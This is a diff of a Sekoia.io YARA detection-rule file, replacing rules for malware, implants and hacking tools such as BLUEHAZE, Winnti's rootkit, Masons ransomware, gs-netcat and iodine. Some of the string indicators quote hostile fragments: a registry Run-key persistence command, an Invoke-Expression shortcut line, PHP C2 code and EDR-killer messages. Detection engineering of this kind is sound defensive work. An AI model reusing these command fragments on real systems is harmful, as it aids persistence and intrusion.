-        75 ??
-        6A 00
-        2B C2
-        50
-        53
-        56
-        E8 ?? ?? ?? ??
-        8A 88 ?? ?? ?? ??
-        30 0C 3E
-        83 C6 01
-        83 D3 00
-        78 ??
-        7F ??
-        81 FE ?? ?? ?? ??
-        72 ??
-        55
-        }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 3MB and ( all of them or hash.md5 ( pe.rich_signature.clear_data ) == "950c0710dc4cbf6e2cd6b857d25da523" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "547e43dd8560fa8b0ca0be9f633bf62d" ) )
+		uint16be( 0 ) == 0x4d5a and pe.imphash ( ) == "e43c58659b5b3082387307603478881a" or hash.md5 ( pe.rich_signature.clear_data ) == "d30bd7875b225709ecf95bf68dbd435f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d7d2079d0a656c06a03f2c277bb08bda" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "61a1425e6a0d28e29c6fd3d451ac3717" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "916bf96ed3274ce8322d9f370432844f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "3fab9d4ae989d53cecb2f443b8ce88d0" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e0967483e074da72ceff4dea3bc17530" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "b4a571736b6646765155ffbd57c27c83" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "35c88ba521887f8fe1b2501f8cd8bd98" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "636dc666c7496cb3382b029fed53473f181cdc24405886c468e51a103d78b4d4" )
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_C2_Source
+
+rule SEKOIA_Launcher_Win_Bluehaze : FILE
 {
 	meta:
-		description = "Detects the PHP code of the SharpTongue C2"
+		description = "Detect the BLUEHAZE malware"
 		author = "Sekoia.io"
-		id = "a2ccf773-511c-4088-8bcf-b923291d024b"
-		date = "2022-07-29"
+		id = "ccfe0593-0a9f-4369-952e-5cef2f459bb3"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharptongue_c2_source.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c301a99876cfe2863546c990654aa922f9327e0eb010968eaea43f1d8ced76da"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/launcher_win_bluehaze.yar#L4-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "56a9d6d713a5744e77c8d34ad28983bb3b2aded1abff47dbf2d887724bd3ed4e"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<?php"
-		$ = "foreach($_GET as $variable => $value)"
-		$ = "$chk=$value"
-		$ = "base64_encode($ip)"
+		$ = "Libraries\\CNNUDTV"
+		$ = "cmd.exe /C wuwebv.exe -t -e"
+		$ = "cmd.exe /C reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v ACNTV /t REG_SZ /d \"Rundll32.exe SHELL32.DLL,ShellExec_RunDLL"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 3 of them or pe.imphash ( ) == "1b3d8fae6035e34f91baa59643746efe" or hash.md5 ( pe.rich_signature.clear_data ) == "44022b7cefeae4d55edcceb5b9bcd295" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "1cdcb493593f8793b10e109f6b5b2993" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "276d668ed7d1b46e101425e02a16460f" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f6a474220add335b5696256235ce8c9c" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "82bccb3330d50080f86ab1aa566cae8e" )
 }
-rule SEKOIA_Tool_Nping_Strings : FILE
+rule SEKOIA_Apt_Nobelium_Acrobox_Downloader_Apr2022 : FILE
 {
 	meta:
-		description = "Detects NPing"
+		description = "Detects AcroBox downloader"
 		author = "Sekoia.io"
-		id = "fcfd9539-b224-45b4-9252-0b4d56a40be4"
-		date = "2022-08-11"
+		id = "77f7f01d-72a2-4b13-b23f-d938a415dd40"
+		date = "2022-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_nping_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0c7216438e9c974d889e4ccc8cdb99ab18d1dc403820d60914b80ff9bc4528fa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_nobelium_acrobox_downloader_apr2022.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ebcbdf13908971eea3e5b291719527e2e454a9ee3b98b5dc66149b2bb3b8fe67"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247779,156 +248284,184 @@ rule SEKOIA_Tool_Nping_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "http://nmap.org/nping"
-		$ = "nping scanme.nmap.org"
-		$ = "Bogus target structure passed to %s"
-		$ = "Packet too short."
-		$ = "read_arp_reply_pcap"
+		$s1 = { 80 ?? 7B
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00
+        80 ?? ?? 0F
+        0F 84 ?? ?? 00 00 }
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $s* )
 }
-rule SEKOIA_Exploit_Linux_Eop_Cve202121974_Exploit_Strings : CVE_2021_21974 FILE
+rule SEKOIA_Storm_1811_Files_Dat
 {
 	meta:
-		description = "Detects CVE-2021-21974 Local Privesc exploit"
+		description = "Detects files used in a campaign performed by the intrusion set Storm-1811"
 		author = "Sekoia.io"
-		id = "8e1fbbe5-7d51-48b4-80d5-90abff8cab9e"
-		date = "2023-12-08"
+		id = "8b14f276-0c39-422b-9b19-d96b139a7ae8"
+		date = "2024-06-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_cve202121974_exploit_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a2e6e2660fcbf6ffa80809c02ca78fae85d27f6cd8d2c83bb2645a86124ca7f2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/storm_1811_files_dat.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d1d5b76671cefe8b876ca8df50205a04ebbcd973f115919b901f6a7946492904"
 		score = 75
 		quality = 80
-		tags = "CVE-2021-21974, FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".name.replace('Thread','SLP Client'"
-		$ = "print('[' + name + '] recv: ', d)"
-		$ = "requests[28].put(connect())"
-		$ = "[+] stack enviorn address:"
+		$s1 = "RuntimeBroker" ascii fullword
+		$s2 = "InstallSpamFilters" ascii fullword
+		$s3 = "newfile333.txt" ascii fullword
+		$s4 = "Installing spam filter kb_outlook" ascii fullword
+		$s5 = "s.zip" ascii fullword
+		$s6 = "Update completed" ascii fullword
+		$s7 = "Updates installed" ascii fullword
+		$s8 = "update_log.tgz uploaded ok" ascii fullword
+		$s9 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii fullword
+		$s10 = "runtimebroker_connect" ascii fullword
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		5 of them
 }
-rule SEKOIA_Tool_Xiebroc2_Strings
+
+rule SEKOIA_Apt_Muddywater_Moriagent : FILE
 {
 	meta:
-		description = "Detects XiebroC2 based on strings"
+		description = "Detects Muddy's Mori Agent implant"
 		author = "Sekoia.io"
-		id = "8451878e-5371-440b-b8ac-f9e6f7643d3c"
-		date = "2024-09-11"
+		id = "e7a83663-6a30-416a-8f29-87a6b9445ea4"
+		date = "2022-01-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_xiebroc2_strings.yar#L1-L40"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "84e665bcbf963a2cf67d879aa3422d79"
-		hash = "3558c376420724694ba244a2e2acd20c"
-		hash = "e29fb9cd825db51a7a2e519f188e61ba"
-		hash = "a3b31739ad5eed51277c8478a83160a3"
-		hash = "d6e2499ea7fe8f047da1a95dae16d2c3"
-		hash = "1616818b65bf49d985bb1816461a4a75"
-		hash = "2e72d3ef2492088a4623d77d5e419ab8"
-		hash = "351770f860507d652ec3644ed1988f7f"
-		hash = "58fa6ad96028753ba8b0b0ed8fa6dccb"
-		hash = "607b541525b27eeefbef1455397bff35"
-		hash = "c2a242612468814e2e951e4db3762059"
-		hash = "431e275f4e43ec4ef7c2cc8ba126e9d3"
-		hash = "ace54bd32c226a7b9a6d4d53791e4021"
-		hash = "f22c21ed7bba1ddfc42ffdc66da3a4dd"
-		hash = "9a5ff9e07ed04cb0e71102cf1aae380c"
-		hash = "d20e01a1af3f40a7a9646d7e7df1b42e"
-		hash = "5544b621c9772cd32c4db77a0e59515a"
-		logic_hash = "f3be31e0f1ad8e8bce132d861de5068340653547d786378f9b8045382f40939f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_moriagent.yar#L3-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "21389d4e71e9a19a9d263b8ced740c337ea88ed4ac97199897b0aa3f5914594a"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RemarkClientColor"
-		$s2 = "HandlePacket"
-		$s3 = "-hide"
-		$s4 = "Failed to send data:"
-		$s5 = "Pac_ket"
-		$s6 = "WANip"
-		$s7 = "%s %s && Kernel: %s"
-		$g1 = "go.buildid"
-		$g2 = "dep    golang.org"
+		$mut = "0x50504060" ascii fullword
+		$cmd1 = "TType" ascii fullword
+		$cmd2 = "TPath" ascii fullword
+		$cmd3 = "TFileid" ascii fullword
+		$cmd4 = "TCommand" ascii fullword
+		$cmd5 = "TTimeout" ascii fullword
+		$cmd6 = "TFilter" ascii fullword
 
 	condition:
-		3 of ( $s* ) and any of ( $g* )
+		uint16be( 0 ) == 0x4d5a and ( ( pe.number_of_exports == 2 and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) ) and ( 5 of them ) )
 }
-rule SEKOIA_Apt_Gamaredon_Gammaload_Maliciouslnk : FILE
+rule SEKOIA_Truesightkiller_Avkiller_Strings : FILE
 {
 	meta:
-		description = "Detects Gamaredon's GammaLoad LNK"
+		description = "TrueSightKiller based on string"
 		author = "Sekoia.io"
-		id = "2612e6c6-0bda-4bfa-a840-aa0a0b4c945b"
-		date = "2022-08-01"
+		id = "8f249ac4-5181-4169-9eb2-7d73ec4fd68d"
+		date = "2024-10-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_gammaload_maliciouslnk.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "94ba156cd6697a9999b6a4f78c4356ea3382b7b3e7a1af79d488aa34df2c3b40"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/truesightkiller_avkiller_strings.yar#L1-L45"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "891202963430a4b1dea2dc5b9af01dc5"
+		hash = "367af202029bf51fc347a8f414fa2a5c"
+		hash = "64439836d69084b129c2dc4264176149"
+		hash = "6e69b890b1c228fa4225776b185b5af7"
+		hash = "daaf7bdf1e7fd882c0bfb89450ec0ab2"
+		hash = "dcf36765ed9386c169eb2695d26f6a6f"
+		logic_hash = "829d144023569f332a27b7f2344d2da7be59ae5044a13c299c5da50d896288ed"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$mshta = "System32\\mshta.exe"
-		$trait = { 0D 0A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 0D 0A }
+		$ = "[+] Process PID: " wide
+		$ = "[-] OpenSCManager failed" wide
+		$ = "[+] Creating service: truesight" wide
+		$ = "[+] Full path: " wide
+		$ = "[-] Error getting current directory." wide
+		$ = "[-] CreateService failed" wide
+		$ = "[!] Service is already running" wide
+		$ = "[-] QueryServiceStatus failed" wide
+		$ = "[-] StartService failed" wide
+		$ = "[+] Driver loaded successfully!" wide
+		$ = "[-] OpenService failed" wide
+		$ = "[-] ControlService failed" wide
+		$ = "[-] DeleteService failed" wide
+		$ = "Welcome to EDR/AV Killer using truesight driver!" wide
+		$ = "This is a PoC, use it at your own risk!" wide
+		$ = "[-] Failed to set CTRL+C handler. Exiting..." wide
+		$ = "ntdll.dll" wide
+		$ = "\\\\.\\TrueSight" wide
+		$ = "[-] CreateFileA failed" wide
+		$ = " not running" wide
+		$ = "[-] Process name: " wide
+		$ = "[+] Terminating PID: " wide
+		$ = "[-] DevicesIoControl failed" wide
+		$ = "[!] Stoping and Deleting trueSight Service!" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and #trait > 100 and $mshta and filesize > 100KB and filesize < 300KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 20 of them
 }
-rule SEKOIA_Spyware_And_Bahamut
+
+rule SEKOIA_Rootkit_Lin_Winnti : FILE
 {
 	meta:
-		description = "Detect Bahamut's spyware based on common information gathering function names"
+		description = "Rootkit used by Winnti"
 		author = "Sekoia.io"
-		id = "d416997e-baf1-412c-bf39-905a6e19b65e"
-		date = "2022-11-23"
+		id = "c800038e-7f8a-4f24-bf0b-06aba6a828cb"
+		date = "2024-05-22"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/2022/11/23/bahamut-cybermercenary-group-targets-android-users-fake-vpn-apps/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/spyware_and_bahamut.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5f44c938fed9b32eaf183be979a67e0c7fde409e72875359105ad7ffb393893d"
+		reference = "https://x.com/naumovax/status/1792902386295394629"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rootkit_lin_winnti.yar#L4-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d57f9190d2d0c65dad6378d705328c0e9ef679eb8dad75af77d4bbc4f9d0f8d9"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "c51dc2132c830c560aaeae4bf48e5f0d28c84b36d27840b5c2ba170d87f4afa5"
-		hash2 = "d7e2cf642b236dba9ba0cbe5a9dc28baf22477973d5ce163e21ec40f5f26e078"
+		hash1 = "161344ae61278e09eacb1c76508cda45555eee109e6d6a031716a096ab5c84f3"
+		hash2 = "bb56e088739b281c9f56b4fa3fa4d285e45b32c4f9f06b647d7e8cb916054e1a"
+		hash3 = "777c1fda4008f122ff3aef9e80b5b5720c9f2dbc3d7e708277e2ccad1afd8cc5"
+		hash4 = "9c770b12a2da76c41f921f49a22d7bc6b5a1166875b9dc732bc7c05b6ae39241"
 
 	strings:
-		$ = "FbDao"
-		$ = "SignalDao"
-		$ = "conionDao"
+		$ = "[CDATA[%s]]></name><type>%o</type><perm>%o</perm><user>%s:%s</user><size>%llu</size><time>%s</time></LIST>"
+		$ = "HideFile"
+		$ = "DownThread"
+		$ = "PortforwardThread"
+		$ = "HidePidPort"
+		$ = "DownFile"
+		$ = "ReadReConnConf"
+		$ = "DecRemotePort"
+		$ = "DecRemoteIP"
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x464c457f and 6 of them and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" )
 }
-rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
+rule SEKOIA_Hacktool_Ntospy_Strings : FILE
 {
 	meta:
-		description = "Tries to detect POLONIUM's DeepCreep implant"
+		description = "Detects Ntospy based on strings"
 		author = "Sekoia.io"
-		id = "b04af229-2bea-4ee8-9e17-8e4befa06e3a"
-		date = "2022-10-12"
+		id = "c3281666-6a31-4718-a9c0-82944c6fdcb0"
+		date = "2023-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_polonium_deepcreep_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "60724d2eb964e2c3681b72bdb732ca640b603af7dc94b4eb6608c77cddb94011"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_ntospy_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e5bd963419e515d65a03592051822fd801f4a21d54cdb18d408556c4bfef78f5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247936,55 +248469,52 @@ rule SEKOIA_Apt_Polonium_Deepcreep_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ";Invoke-Expression -Command '$shortcut =" ascii wide
-		$ = "CreateShortcut($c1" ascii wide
-		$ = "svchostdp.exe" ascii wide
-		$ = "HNlIC91IA==" ascii wide
+		$ = "NPGetCaps"
+		$ = "NPLogonNotify"
+		$ = {43 00 3A 00 5C 00 [10-150] 00 2E 00 6D 00 73 00 75}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 3MB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 300KB and all of them
 }
-rule SEKOIA_Apt_Apt41_Javascript_Dropper : FILE
+rule SEKOIA_Ransomware_Win_Masons_Jan2023 : FILE
 {
 	meta:
-		description = "Detects Earth Lusca JS dropper"
+		description = "Rule to detect Masons ransomware samples."
 		author = "Sekoia.io"
-		id = "fde70806-af50-4706-9daf-d39ad0564fc7"
-		date = "2024-02-26"
+		id = "cf2af08b-b4a8-4245-9308-242e15aeb346"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt41_javascript_dropper.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "3e34af7141e41044c3d3e099e8b8deafc7441ea47ccbd8af7ffe686f10bb18a2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_masons_jan2023.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "05badf0364c6f61cd081a3ae64bc92b48e6f59c026a5d6b5b68acd5a8987cf91"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "7826978642c568f975e2b65d1575fdf92e634f7c80db2c86c9d7c8066e8955b8"
 
 	strings:
-		$s1 = "eval(function(p, a, c, k, e, r) {"
-		$s2 = "|4d53"
-		$s3 = "ActiveXObject"
-		$x1 = " -F:* %1%"
-		$x2 = "&I /r c:\\"
-		$x3 = "ActiveXObject"
+		$s1 = "Masons" wide
+		$s2 = "@mineralIaha/@root_king1" wide
+		$s3 = "Glory @six62ix" wide
 
 	condition:
-		filesize < 2MB and ( all of ( $s* ) or all of ( $x* ) )
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Tool_Gsocket_Strings : FILE
+rule SEKOIA_Tool_Iodine_Strings : FILE
 {
 	meta:
-		description = "Detects Gsocket based on strings"
+		description = "Detects iodine based on strings"
 		author = "Sekoia.io"
-		id = "55fb2f2b-1074-4b6d-9113-48eaeb0e1e27"
-		date = "2024-06-10"
+		id = "029766cc-80fb-423d-adc5-8867c438c5d3"
+		date = "2024-02-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_gsocket_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c54308293a9f64b571282eac9fba01e4671ba6b0cd45936fab92d4d9af904bbb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_iodine_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "049b5af42d204061bd7e0c0294bb0abea492647dce8ec63fa3f296d1a19cb246"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -247992,28 +248522,26 @@ rule SEKOIA_Tool_Gsocket_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "proxy. It allows multiple gs-netcat clients to (securely) relay"
-		$ = "GS-NETCAT(1)            General Commands Manual          GS-NETCAT(1)"
-		$ = "-T      Use TOR. The gs-netcat tool will connect via TOR to the GSRN."
-		$ = "-D      Daemon & Watchdog mode. Start gs-netcat as a background process"
-		$ = "gs-netcat [-rlgvqwCTSDiu] [-s secret] [-k keyfile] [-L logfile] [-d IP]"
-		$ = "The gs-netcat utility is a re-implementation of netcat."
+		$ = "Sending DNS queries for %s to %s"
+		$ = "No tun devices found, trying utun"
+		$ = "iodine IP over DNS tunneling client"
+		$ = "topdomain is the FQDN that is delegated to the tunnel endpoint."
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xcafebabe ) and filesize > 2MB and filesize < 6MB and 2 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
+rule SEKOIA_Malware_Venom_Agent_Strings : FILE
 {
 	meta:
-		description = "Detects the loop used in PowGoop and its loader"
+		description = "Detects Venom agent strings"
 		author = "Sekoia.io"
-		id = "644ed1c4-e0e1-496e-9efc-7d9e15565f7b"
-		date = "2022-01-13"
+		id = "87633510-8b39-4eb1-b95b-4ebff21f3bba"
+		date = "2022-08-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_powgoop_decode_loop.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1d60f53014fb1934a85a573856244431c8f565c2f024511991817e6235566815"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_venom_agent_strings.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "66dd1cb7bd66fcf78c8eaad8aaab7cfd624b898b7b479e571bacf5c4e48edac9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248021,54 +248549,64 @@ rule SEKOIA_Apt_Muddywater_Powgoop_Decode_Loop : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "System.Collections.Generic.List[System.Object]" ascii wide
-		$s2 = "$d.Add($in[$i]);" ascii wide
-		$s3 = "[System.Convert]::FromBase64String(" ascii wide
+		$ = "dispather.handleDownloadCmd"
+		$ = "dispather.handleUploadCmd"
+		$ = "dispather.handleShellCmd"
+		$ = "dispather.handleSocks5Cmd"
+		$ = "dispather.handleLForwardCmd"
+		$ = "dispather.localLForwardServer"
+		$ = "dispather.handleRForwardCmd"
+		$ = "dispather.AgentHandShake"
+		$ = "dispather.AgentParseTarget"
+		$ = "dispather.PipeWhenClose"
+		$ = "dispather.handleSshConnectCmd"
+		$ = "node.(*NetworkTopology).InitNetworkMap"
+		$ = "node.CopyNet2Node"
+		$ = "node.(*Node).CommandHandler.func1"
+		$ = "node.(*Buffer).WriteLowLevelPacket"
+		$ = "protocol.(*Packet).ResolveDat"
+		$ = "netio.InitTCP.func2"
 
 	condition:
-		filesize < 1MB and $s2 in ( @s1 .. @s1 + 400 ) and $s3 in ( @s1 .. @s1 + 400 )
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 10MB and 6 of them
 }
-rule SEKOIA_Darkriver_Encodedurl : FILE
+rule SEKOIA_Hacktool_Ipmipwner_Strings : FILE
 {
 	meta:
-		description = "Detects encoding URL inside docx documents"
+		description = "Detects ipmiPwner script"
 		author = "Sekoia.io"
-		id = "60f1676f-dade-4376-9980-f510dff52ae5"
-		date = "2023-10-10"
+		id = "2ac736b5-33bb-477f-a98c-57cc2744d251"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/darkriver_encodedurl.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9477ec39cc1d4cfad676d071748e7e1918a3996b342663cb0a01658846bbf9f5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_ipmipwner_strings.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "122311e1791d018f08f3d5ecdf2e0efe3aa5bb913b2c1ce6a3797e8ceb2676eb"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "5c9551388213f54c4b54cd42ccb034d8d9173a4bbfcf8b666e0db8df929762e7"
-		hash1 = "13de9f39b1ad232e704b5e0b5051800fcd844e9f661185ace8287a23e9b3868e"
